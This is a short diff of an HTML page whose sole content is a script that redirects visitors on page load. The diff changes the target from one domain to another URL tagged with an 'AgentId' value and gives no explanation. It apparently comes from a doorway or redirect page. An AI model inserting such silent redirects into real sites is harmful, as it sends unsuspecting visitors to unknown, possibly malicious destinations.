--- a/344494.html
+++ b/344494.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://dl.hawcyy.com/?parent=344494&t=1592792440"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
